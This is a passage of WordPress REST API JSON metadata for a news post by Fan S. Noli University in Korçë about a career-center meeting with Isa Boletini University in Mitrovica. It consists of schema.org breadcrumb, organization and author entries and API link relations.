ko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unkorce.edu.al\/"},{"@type":"ListItem","position":2,"name":"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb."}]},{"@type":"WebSite","@id":"https:\/\/unkorce.edu.al\/#website","url":"https:\/\/unkorce.edu.al\/","name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","description":"Mir&euml;sevini n&euml; faqen zyrtare!","publisher":{"@id":"https:\/\/unkorce.edu.al\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unkorce.edu.al\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/unkorce.edu.al\/#organization","name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","url":"https:\/\/unkorce.edu.al\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/","url":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png","contentUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png","width":200,"height":120,"caption":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb"},"image":{"@id":"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/unkorce"]},{"@type":"Person","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e","name":"Brikela Qelemeni","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g","caption":"Brikela Qelemeni"},"url":"https:\/\/unkorce.edu.al\/en\/author\/brikela\/"}]}},"_links":{"self":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/35709","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/comments?post=35709"}],"version-history":[{"count":5,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/35709\/revisions"}],"predecessor-version":[{"id":37252,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/posts\/35709\/revisions\/37252"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/media\/35710"}],"wp:attachment":[{"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/media?parent=35709"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/categories?post=35709"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unkorce.edu.al\/en\/wp-json\/wp\/v2\/tags?post=35709"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}